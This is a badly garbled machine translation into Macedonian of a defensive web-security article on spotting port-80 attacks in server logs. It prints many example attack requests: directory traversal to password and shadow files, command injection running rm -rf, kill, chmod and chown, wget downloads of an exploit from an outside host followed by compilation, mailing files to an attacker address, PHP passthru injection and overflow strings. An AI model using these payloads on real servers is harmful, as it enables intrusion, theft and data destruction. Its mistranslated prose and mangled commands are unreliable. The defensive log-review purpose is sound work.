I. Резиме
II. Детален опис на
Синодот. Дополнителни
Владиката. ОБСЕ анализа
В. Транскодиране
VI. Заклучок
[Резиме]
На стандардниот веб сајт порт 80 за услугата, таа е сè во врска со пуштањето на безбедносни проблеми чува некои од овие слабости дозволи на напаѓачот да добие систем или администраторски права за да влезат во Мапа на себе, на следниве е Zenomorph напад врз начинот на околу 80 пристаниште траги од истражување, и ти кажам како да најдете проблеми од најавите записи.
[Детална]
Овде, во дел преку бројот на Liezi приказ на веб сервери и апликации на нивните општи напад, и нејзините траги, кои претставуваат само Liezi голем напад, не постои листа на сите форма на напад, овој дел ќе детален опис на улогата на секој напад, и нејзините како да ги искористат овие слабости за напад.
(1) "." ".." И "..." барање
Траги од овие напади се многу вообичаени за веб апликации и веб сервер, кој се користи да им се овозможи на напаѓачот или црв-вирус програмата за да се промени пат на веб-серверот, за да се добие пристап до затворени области. Повеќето CGI програми со овие недостатоци, ".." барање.
Пример:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Ова покажува напаѓачот Liezi барање mosd оваа датотека, ако напаѓачот на способноста пробив веб сервер root директориумот, а потоа да добиете повеќе информации и да добијат дополнителни привилегии.
(2) "% 20" барање
% 20 е хексадецимален вредност, која на 16-простори, иако тоа не значи дека можете да го користите ништо, но кога ќе погледнете во дневникот ќе го најдете, некои веб сервер апликација се извршува на овој лик може да биде ефикасно имплементиран Затоа, треба внимателно да ги разгледа најавите. Од друга страна, на барање понекогаш може да ви помогне да изведува некои команди.
Пример:
http://host/cgi-bin/lame.cgi?page=ls% 20-ал |
Оваа Liezi покажува напаѓачот да извршат Unix команда, листата на целиот каталог на документи што се бараат, предизвикувајќи на напаѓачот за пристап до важни датотеки на вашиот систем, за да му помогне за понатаму се овозможат услови за добивање привилегии.
(3) "% 00" барање
% 00, рече 16-бајт хексадецимално празно, тој беше во можност да ги измамат на веб апликација, и барањето на различни типови на датотеки.
Примери:
http://host/cgi-bin/lame.cgi?page=index.html
Ова може да биде валидна барањето во машина, ако напаѓачот свесни за ова побарување беше успешна, тој уште повеќе ќе ја барате на CGI процедури.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Можеби cgi не прифаќа ова барање, бидејќи тоа е барање да се провери име на датотека Наставка, како што се: html.shtml или други тип на датотека. Повеќето програми ќе ти кажам на бараниот тип на датотека е невалидна, овој пат таа ќе каже напаѓачот барањата на датотеката мора да биде лик на тип на датотека Наставка, па напаѓачот може да се добие на системот пат, името на датотеката, што резултира во Вашиот систем повеќе чувствителни информации
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Внимание на ова барање, тоа ќе измамник cgi програма дека овој документ е да се одреди прифатливо типови на датотеки, некои апликации на ефективни инспекции, како глупава барање датотека, која е најчесто се користат методи на напаѓачот.
(4) "|" барање
Ова е луле карактер, во Unix систем, барањето за помош во спроведувањето на неколку систем команди во исто време.
Пример:
# Кат access_log | grep-i ".."
(Оваа команда ќе ги прикаже влезете во ".." Ова најчесто се користи во нападите и црви резултат)
Често се најде дека многу веб апликации користете го овој карактер, ова исто така доведува до лажни тревоги во IDS логови.
Во внимателен преглед на вашата апликација, па така предност на намалување на лажни тревоги во Intrusion Detection системи.
Еве некои од Lieh-це:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Ова барање командата, следниве се некои промени во Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-ал% 20/etc |
Ова барање е наведено во Unix систем / etc директориумот на сите датотеки
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "Неубедливите"
Мачката команда извршување барање и спроведувањето на grep командата ќе исто така, проверете на "Неубедливите"
(5) "," барање
Во UNIX системите, овој лик им овозможува на повеќе командната линија извршување
Пример:
# Id; uname-a
(Имплементација на проект команда, по што следи спроведувањето на uname команда)
Некои веб-програма со овој лик, може да резултира во вашиот IDS логовите предупредување од неуспех, вие внимателно треба да го проверите вашиот веб-програмата, така да се намали ризикот од неуспех на IDS сигнали.
(6) " " и " " Барам
Треба да проверите вашата логовите рекорд на два лика, голем број на причини, првата е ликот дека додадените податоци во документот
Пример 1:
# Echo "вашиот hax0red h0 h0" / etc / MOTD (MOTD барање писмени информации во овој документ)
Напаѓачот лесно можат да го користат на барање како погоре упаднат во вашиот веб страница. Како што се експлоатира на познатиот RDS напаѓачот често се користи за промена на веб-страница.
Пример 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html ќе забележите дека јазикот на знаци овде, тој, исто така, помина " "," " ликови, таквите напади не може да предизвика напаѓачот да пристапите на системот, збунети луѓето мислат дека ова е легитимен веб-страница на информации (што доведува до Луѓе ја посетите оваа врска да ја посетите напаѓачот да го поставите адреса, ова барање може да биде енкодирана во 16 хексадецимален карактери во форма, така што траги на нападот не е толку очигледна)
(7) "!" Барањето
Заеднички јазик за овој лик барање СС (server side Вклучи) го напаѓам, доколку напаѓачот е напаѓачот збуни корисникот ќе кликне на линкот е поставен, и исто како и погоре.
Пример:
http://host1/something.php =
На Lieh-це е напаѓачот да го направиме тоа во датотека на сајтот host2 од host1 се појавува погоре (се разбира, да бараат посетители на посета Connection Settings напаѓачот е. Ова барање може да се претвори во 16 хексадецимален кодирање маска, не може лесно пронајдени)
Во исто време, овој пристап исто така може да се изврши командата орган веб сајт
Пример:
http://host/something.php =
На Lieh-кандидира на далечинскиот управувач, систем "ID" команда, тоа ќе покаже ID на веб-сајтот на членот, е обично "никој" или "www"
Оваа форма, исто така, им овозможува на вклучени скриени датотеки.
Пример:
http://host/something.php =
Скриените фајлови. Htpasswd нема да бидат прикажани, Апачи ќе одбие да се воспостават такви правила да. HT барање форма, и SSI лого ќе бајпас такви ограничувања, да доведе и до безбедносни проблеми
(8) "," Барам
Таквите напади се користат да се обиде да далечински вметнете PHP веб процедурите за апликација, може да овозможи извршување цел, во зависност од серверот на подесувањата, и други фактори на работа (како што се php е поставено на безбеден мод)
Пример: http://host/something.php = passthru ("ID ");?
Во некои едноставни php апликација, таа може да биде кон веб сајт на далечинскиот управувач, систем за кориснички права за вршење на локалните команда
(9) "` "барање
Овој лик подоцна се користат за извршување на команди во Perl, ликовите во веб апликацијата не е често користена, па ако ти го гледаш во вашиот најавите, треба да биде многу внимателен
Пример:
http://host/something.cgi = "ID"
Напиши Perl cgi програма во прашање ќе доведе до спроведување на проект команда
[Повеќе]
Следниве дел ќе разговараат за спроведувањето на повеќе напади би можеле да команда, заедно со бараниот на документи, и ако имаш далечински команда извршување мааната, што треба да биде како да се провери откритие. Овој дел е само да ви даде добра идеја, и кажете му на вашиот систем она што се случува, напаѓачите се обидуваат да го нападне вашиот систем траги, но не сите листа на напаѓачот да го користите команди и барања.
"/ Bin / ls"
Оваа команда барањата на целиот пат, во многу веб апликации ја имаат оваа дупка, ако влезете во многу места такво барање, можно е за големи оддалечено извршување команда ранливост, но не мора да значи проблем , исто така, може да биде лажна тревога. Уште еднаш потсети, веб апликации напишани (CGI, ASP, PHP ... итн) е основа на безбедноста
Пример:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-ал |
http://host/cgi-bin/bad.cgi?doh=ls% 20-ал;
"Cmd.exe"
Ова е прозорците на школка, ако напаѓачот да пристапите и да ја извршите оваа скрипта на серверот поставувања под условите дозволено во Windows машина може да направи ништо, многу црви е преку порт 80, комуникацијата со далечински машина
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / ID"
Ова е две бинарни датотеки, неговите проблеми и / bin / ls, како, ако влезете во многу места такво барање, можно е за големи оддалечено извршување команда ранливост, но не мора да значи проблем , исто така, може да биде лажна тревога.
Тоа ќе покаже кој дел припаѓа на кој корисник и група
Пример:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / РМ"
Оваа команда може да избришете фајлови без правилната употреба е многу опасна
Примери:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-RF% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-RF% 20 *;
"Wget и tftp" команда
Овие команди се често напаѓачот може да добијат дополнителни привилегии за да ја преземете датотека, wget е Unix команда под, може да се користи за да ја преземете backdoors, tftp е под команда на Unix и NT, се користи за да ја преземете датотеката. Некои IIS црви се шири со tftp за копирање на вирусот на други хостови
Примери:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// домаќин / cgi-bin / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Мачка" на командната
Оваа команда се користи за да ја видите содржината на датотеката, кој се користи за читање на важни информации, како што се конфигурациските датотеки, лозинка додадени фајлови, кредитни датотеки и документи со кои ќе можам да се сетам на
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = мачка% 20/etc/motd;
"Ехо" команда
Оваа команда се користи за запишување на податоци во датотеката, како што се "index.html"
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "FC-kiwis #% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "FC-kiwis #% 20was% 20here"% 20 % 200day.txt;
"ОУ" команда
Листи на моментално работниот процес, кажете му на напаѓачот дека оддалечениот компјутер водење на софтвер со цел да се добие некоја идеја на прашањата на безбедноста, за да добијат дополнителни дозволи
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH = ps% 20-Aux;
"Убиј и killall" команда
Unix системи со цел да го убие овој процес, на напаѓачот да го користите оваа команда за да го запрете системски услуги и процеси, исто така, може да ги избрише трагите на напаѓачот, некои искористуваат ќе произведува многу дете процеси
Примери: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" команда
Оваа команда му кажува на напаѓачот името на далечинскиот управувач машина, за извесно време, преку овој веб сајт со цел за да дознаете кој интернет провајдер, е напаѓачот кој можат да бидат посетени и денес. Uname-а до барање нормално, тие ќе бидат евидентирани во датотека за евиденција
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? DOH = uname% 20-а;
"CC, gcc, perl, python, итн ..." компајлирање / толкување на командата
Напаѓачот преку wget или tftp преземете подвиг, и употребата на Криејтив комонс, gcc компајлерот да ги собере во извршна програма, како и понатамошен пристап привилегии
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-P% 2031337;
Ако видите логовите се наоѓаат во "Perl" Пајтон "Овие упатства може да биде оддалечен напаѓачот да ја преземете perl, python скрипта, и се обидел да привилегиите на локалната
"Пошта" команда
Напаѓачите често ја користите оваа команда систем, некои важни документи да поседувате сандаче напаѓачот, но, исто така, сакаат да e-mail бомбашки напади се извршени
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, итн ..." и други команди
Unix системи со цел да им овозможи да ја смени дозволите за датотеката
chown = овозможува поставување на датотеки сопственик chmod = овозможува да го поставите пермисии chgrp = овозможува на сопственикот да го промените груповите права на датотеки chsh = дозволено да се промени школка на корисникот
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" датотеката
Ова е систем лозинка датотека, обично над сенка, и не му е дозволено да ја гледаш лозинката енкрипција, но оние што го напаѓаат, можете да Zhidaonaxie е валидна посетител и системот апсолутна патека имиња, и така на страницата информации, Youyutongchang од сенка надвор, па напаѓачот нормално ќе видите во / etc / сенка датотека
"/ Etc / master.passwd"
Оваа датотека е систем BSD лозинка датотека, содржи шифрирана лозинка, датотеката на сметката на root е само read-only, а некои нестручни напаѓачите ја отвори својата обид да ги читаат содржините внатре. Ако на Веб страницата е привилегии на root да се кандидира, тогаш напаѓачот е, ние можеме да ги читаат содржините внатре, многу проблеми на администраторот на системот ќе дојде еден по друг
"/ Etc / сенка"
Содржи лозинка шифрирана систем, да се прочита истиот на сметката на root, и / et / master.passwd речиси
"/ Etc / MOTD"
Кога корисниците се најавуваат во Unix систем, информациите се појавува, во "Порака на денот" датотека, тоа обезбедува важни информации за системот и администратор на корисниците на некои поставени, корисниците кои сакаат да ги гледам оние коишто не се, , исто така, содржи и систем за печатење информации, напаѓачот обично ја гледаат оваа датотека, да се разбере она што системот е се извршува на напаѓачот, следниот чекор е да пребарување за овој вид на систем, подвиг, и понатамошен пристап на системот за привилегии
"/ Etc / Силите"
Во документот се предвидува ip адреса и мрежна информации, напаѓачот може да дознаете повеќе за Network Settings на системот
"/ Usr / local / Apache / conf / httpd.conf"
Ова е веб сервер Apache конфигурациската датотека, напаѓачот може да го сфати, како што се CGI, SSI и други информации се достапни
"/ Etc / inetd.conf"
Ова е конфигурациската датотека ако е услуга, напаѓачот може да дознаете на далечинскиот управувач машина, на проектот, овие услуги, без оглед дали се користи на омотот за контрола на пристап, ако на омотот беше пронајдена трчање, напаѓачот на следниот чекор, ќе го провериме "/ etc / hosts.allow" и "/ etc / hosts.deny", датотека, и која може да менува некои поставувања, пристап привилегии
". Htpasswd. Htaccess, и. Htgroup"
Овие датотеки се најчесто се користат во веб-страница на корисник авторизација, напаѓачот ќе видите овие фајлови, и да добие корисничко име и лозинка, лозинка датотека. Htpasswd е шифрирана пробијат неколку едноставни декрипција процес, му дозволува на напаѓачот да пристапите на овој сајт заштитени подрачја (обично корисник со истото корисничко име и лозинка, напаѓачот дури и да ја посетите други сметка)
"Access_log и error_log"
Овие се Apache серверот фајлови, напаѓачите често овие датотеки, погледнете овие барања се снимаат, и овие и други барања за различни места
Типично, напаѓачот ќе се измени овие лог датотеки, како своја адреса информации, напаѓачот преку пристаништето 80 преку вашиот систем и резервната систем, исто така, не функционира, не постои друг запис програма рекорд систем статус, што би Intrusion Detection станува многу тешко да се работи
"[DRIVE-писмо]: winntrepairsam._ или [DRIVE-писмо]: winntrepairsam"
Windows NT систем лозинка датотека, ако на далечинскиот управувач команда не може да се спроведе, напаѓачите обично ќе побара овие документи, тогаш "l0pht пукнатината" од типот на лозинка напукнување алатки да попуштат, доколку напаѓачот се обидува да го нападне лозинка датотека администраторот, ако успешни тогаш далечниот машина ќе биде напаѓачот добива контрола
[Прелевање анализа]
Во овој напис јас нема да кажува премногу за на претекување на темата, јас ќе ти даде од она што оние феномени и траги од забележлива и од особена загриженост, тампон често се нападнати од страна на напаѓачот кодот конверзија и тешко да се најдат други начини да се постигне
Тука е едноставен Лие Жи
Пример: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA АА
Оваа Liezi покажува напаѓачот на некоја апликација да испрати многу лик, за тестирање на програмата на buffer overflow, buffer overflow може да се добие далечински команда извршување домаќин дозволи, доколку сопственикот има setuid и процедури за коренот, преку преливник, може да се добие пристап до целиот систем, ако не како setuid програма, а потоа на претекување е само со извршување на корисникот на веб-страницата на правата на
Тука не можам да кажам сите околности, но редовно треба да го проверите вашиот log датотеката, ако тој ден одеднаш пронајдовме голем број барања, но обично не повеќе од барањето, тоа значи дека сте изложени на претекување напади, се разбира, исто така, може да се А новата мрежа црв напад
[Транскодиране]
Сите напади споменати погоре барање, напаѓачот обично знае IDS системи често механички провериш барање, обично на напаѓачот ќе ги користи податоците за имплементацијата алатка за конвертирање на бараниот содржина формат 16 бенд, што резултира во IDS ќе ги игнорира овие барања, Ние сме запознаени со CGI мустак ранливоста скенирање алатка која е добар Liezi. Ако погледнете дневникот на времето пронајдени голем број на 16-бенд, а не некои општи знаци, тогаш напаѓачот може да се обиде да ги користат некои од начините да го нападне вашиот систем
Брз начин е вашата датотека за евиденција како барање за оние 16 канаста, ископирајте ја во вашиот интернет пребарувач, интернет прелистувачот може да се конвертира во право барање, и е прикажана содржината на барањето, ако не храброст да се земе овој ризик, просто човек ASCII, може да ви овозможи со точни код.
[Заклучок]
Овој член не може да ги покрие сите 80 пристаништа на нападот, но повеќето биле гафови повеќе од општиот напад, и кажете како да проверите вашата лог датотеки, и како да го додадете како на пример бројот на IDS правила, пишете нејзината цел е да се веб администратор на системот треба да биде загрижен за тоа што е добра идеја, и се надевам дека овој член може да помогне во веб програма веб програмерите да пишуваат подобро програми
НА ЗАБЕЛЕШКА: Ако имате било какви коментари и предлози, пратете e-mail admin@cgisecurity.com.